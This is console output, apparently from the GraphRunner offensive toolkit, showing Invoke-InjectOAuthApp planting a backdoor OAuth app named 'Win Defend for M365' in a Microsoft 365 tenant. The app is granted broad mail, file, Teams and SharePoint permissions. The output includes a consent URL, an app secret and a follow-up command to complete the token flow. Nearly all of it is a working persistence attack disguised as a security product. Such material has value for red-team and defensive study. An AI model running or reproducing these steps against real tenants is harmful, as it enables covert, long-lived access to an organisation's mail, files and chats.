PS C:\Users\beau\Desktop\GraphRunner\GraphRunner_Outputs> Invoke-InjectOAuthApp -Tokens $tokens -AppName "Win Defend for M365" -ReplyUrl "http://localhost:8000" -scope "op backdoor"
[*] Using the provided access tokens.
[*] Getting Microsoft Graph Object ID
Graph ID: 00000003-0000-0000-c000-000000000000
Internal Graph ID: ac06c22a-3f06-4e5e-93c3-03f716deea65
[*] Now getting object IDs for scope objects:
[*] One overpowered (OP) backdoor is coming right up! Here is the scope:
openid profile offline_access email User.Read User.ReadBasic.All Mail.Read Mail.Send Mail.Read.Shared Mail.Send.Shared Files.ReadWrite.All EWS.AccessAsUser.All ChatMessage.Read ChatMessage.Send Chat.ReadWrite Chat.Create ChannelMessage.Edit ChannelMessage.Send Channel.ReadBasic.All Presence.Read.All Team.ReadBasic.All Team.Create Sites.Manage.All Sites.Read.All Sites.ReadWrite.All Policy.Read.ConditionalAccess
openid : "37f7f235-527c-4136-accd-4a02d197296e"
profile : "14dad69e-099b-42c9-810b-d002981feec1"
offline_access : "7427e0e9-2fba-42fe-b0c0-848c9e6a8182"
email : "64a6cdd6-aab1-4aaf-94b8-3cc8405e90d0"
User.Read : "e1fe6dd8-ba31-4d61-89e7-88639da4683d"
User.ReadBasic.All : "b340eb25-3456-403f-be2f-af7a0d370277"
Mail.Read : "570282fd-fa5c-430d-a7fd-fc8dc98a9dca"
Mail.Send : "e383f46e-2787-4529-855e-0e479a3ffac0"
Mail.Read.Shared : "7b9103a5-4610-446b-9670-80643382c1fa"
Mail.Send.Shared : "a367ab51-6b49-43bf-a716-a1fb06d2a174"
Files.ReadWrite.All : "863451e7-0667-486c-a5d6-d135439485f0"
EWS.AccessAsUser.All : "9769c687-087d-48ac-9cb3-c37dde652038"
ChatMessage.Read : "cdcdac3a-fd45-410d-83ef-554db620e5c7"
ChatMessage.Send : "116b7235-7cc6-461e-b163-8e55691d839e"
Chat.ReadWrite : "9ff7295e-131b-4d94-90e1-69fde507ac11"
Chat.Create : "38826093-1258-4dea-98f0-00003be2b8d0"
ChannelMessage.Edit : "2b61aa8a-6d36-4b2f-ac7b-f29867937c53"
ChannelMessage.Send : "ebf0f66e-9fb1-49e4-a278-222f76911cf4"
Channel.ReadBasic.All : "9d8982ae-4365-4f57-95e9-d6032a4c0b87"
Presence.Read.All : "9c7a330d-35b3-4aa1-963d-cb2b9f927841"
Team.ReadBasic.All : "485be79e-c497-4b35-9400-0e3fa7f2a5d4"
Team.Create : "7825d5d6-6049-4ce7-bdf6-3b8d53f4bcd0"
Sites.Manage.All : "65e50fdc-43b7-4915-933e-e8138f11f40a"
Sites.Read.All : "205e70e5-aba6-4c52-a976-6d2d46c48043"
Sites.ReadWrite.All : "89fe6a52-be36-487e-b7d8-d061c450a026"
Policy.Read.ConditionalAccess : "633e0fce-8c58-4cfb-9495-12bbd5a24f7c"
[*] Finished collecting object IDs of permissions.
[*] Now deploying the app registration with display name Win Defend for M365 to the tenant.
[*] If everything worked successfully this is the consent URL you can use to grant consent to the app:
--------------------------------------------------------
https://login.microsoftonline.com/organizations/oauth2/v2.0/authorize?client_id=0d12348-fc2b-4852-2348-7d7b234205bf&response_type=code&redirect_uri=http%3a%2f%2flocalhost%3a8000&response_mode=query&scope=openid%20profile%20offline_access%20email%20User.Read%20User.ReadBasic.All%20Mail.Read%20Mail.Send%20Mail.Read.Shared%20Mail.Send.Shared%20Files.ReadWrite.All%20EWS.AccessAsUser.All%20ChatMessage.Read%20ChatMessage.Send%20Chat.ReadWrite%20Chat.Create%20ChannelMessage.Edit%20ChannelMessage.Send%20Channel.ReadBasic.All%20Presence.Read.All%20Team.ReadBasic.All%20Team.Create%20Sites.Manage.All%20Sites.Read.All%20Sites.ReadWrite.All%20Policy.Read.ConditionalAccess&state=1234
--------------------------------------------------------
Application ID: 0d12348-fc2b-4852-2348-7d7b234205bf
Object ID: 98b88ab6-1bd7-411d-8276-382c2c0ccfaa
Secret: q3d8Qxcbz23Seh1.~zGZu_8INKqy077U23d234ajf
--------------------------------------------------------
Localhost detected in Reply URL field. You can use the Invoke-AutoOAuthFlow module to complete the OAuth flow automatically.
--------------------------------------------------------
Invoke-AutoOAuthFlow -ClientId "0d12348-fc2b-4852-2348-7d7b234205bf" -ClientSecret "q3d8Qxcbz23Seh1.~zGZu_8INKqy077U23d234af" -RedirectUri "http://localhost:8000" -scope "openid profile offline_access email User.Read User.ReadBasic.All Mail.Read Mail.Send Mail.Read.Shared Mail.Send.Shared Files.ReadWrite.All EWS.AccessAsUser.All ChatMessage.Read ChatMessage.Send Chat.ReadWrite Chat.Create ChannelMessage.Edit ChannelMessage.Send Channel.ReadBasic.All Presence.Read.All Team.ReadBasic.All Team.Create Sites.Manage.All Sites.Read.All Sites.ReadWrite.All Policy.Read.ConditionalAccess"